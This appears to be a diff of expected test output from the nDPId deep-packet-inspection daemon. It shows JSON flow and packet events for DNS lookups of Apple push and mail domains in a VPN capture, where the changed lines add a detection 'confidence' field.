-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1569687267800,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1569687267800,"pkt":"LH6BsEqhNDY7z3UoCABFAABOdGcAAP8Rpb4KAADjS0tLS+i+ADUAOr+fEJABAAABAAAAAAAACTEtY291cmllcgdzYW5kYm94BHB1c2gFYXBwbGUDY29tAAABAAE="}
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1569687267805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1569687267805,"pkt":"LH6BsEqhNDY7z3UoCABFAABHoW4AAP8ReL4KAADjS0tLS\/rBADUAMyCpE94BAAABAAAAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAQ=="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1569687267812,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1569687267812,"pkt":"LH6BsEqhNDY7z3UoCABFAAA9PxQAAP8R2yIKAADjS0tLS8sWADUAKZk5eJ4BAAABAAAAAAAABG1haWwGdmlhc2F0A2NvbQAAAQAB"}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1569687267814,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":1569687267814,"pkt":"NDY7z3UoLH6BsEqhCABFAADSAABAADoRnqJLS0tLCgAA4wA167UAvhHNhe+BgAABAAQAAAAAA3d3dwVhcHBsZQNjb20AAAEAAcAMAAUAAQAABRUAGwN3d3cFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AMArAAUAAQAAFoEALwN3d3cFYXBwbGUDY29tB2VkZ2VrZXkDbmV0C2dsb2JhbHJlZGlyBmFrYWRuc8BBwFIABQABAAAE7QAZBWU2ODU4BWRzY2U5CmFrYW1haWVkZ2XAQcCNAAEAAQAAAAcABLgbc6E="}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1569687267814,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.27.115.161"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1569687267814,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.27.115.161"}}
 00813{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1569687267818,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"ts_msec":1569687267818,"pkt":"NDY7z3UoLH6BsEqhCABFAAE1AABAADoRnj9LS0tLCgAA4wA16L4BIf0XEJCBgAABAAoAAAAACTEtY291cmllcgdzYW5kYm94BHB1c2gFYXBwbGUDY29tAAABAAHADAAFAAEAAElSAC0BMRpjb3VyaWVyLXNhbmRib3gtcHVzaC1hcHBsZQNjb20GYWthZG5zA25ldADAPgAFAAEAAACOACIUdXMtc2FuZGJveC1jb3VyaWVyLTQKcHVzaC1hcHBsZcBbwHcAAQABAAAALgAEEbyKR8B3AAEAAQAAAC4ABBG8hEjAdwABAAEAAAAuAAQRvIbKwHcAAQABAAAALgAEEbyKSMB3AAEAAQAAAC4ABBG8iLrAdwABAAEAAAAuAAQRvIU9wHcAAQABAAAALgAEEbyHusB3AAEAAQAAAC4ABBG8ikY="}
-00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}}
+00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}}
 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1569687267819,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"ts_msec":1569687267819,"pkt":"NDY7z3UoLH6BsEqhCABFAACwAABAADoRnsRLS0tLCgAA4wA1x3QAnFOt9V6BgAABAAMAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQABwAwABQABAAAYQwAlATESY291cmllci1wdXNoLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA2AAUAAQAAABcAHQ91cy1zdy1jb3VyaWVyLTQKcHVzaC1hcHBsZcBLwGcAAQABAAAAFwAEETmQdA=="}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"}
 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1569687267824,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"ts_msec":1569687267824,"pkt":"NDY7z3UoLH6BsEqhCABFAACyAABAADoRnsJLS0tLCgAA4wA1+sEAnlIeE96BgAABAAMAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAASVMAJgIyNBJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAGwAdD3VzLXN3LWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAAuAAQROZAU"}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1569687267831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1569687267831,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3jBMAAP8RjikKAADjS0tLS8J1ADUAI5qcqN8BAAABAAAAAAAABWFwcGxlA2NvbQAAAQAB"}
-00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABnAABAADoRnw1LS0tLCgAA4wA1wnUAU2BUqN+BgAABAAMAAAAABWFwcGxlA2NvbQAAAQABwAwAAQABAAAE+gAEEbJgO8AMAAEAAQAABPoABBGOoDvADAABAAEAAAT6AAQRrOAv"}
-00747{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}}
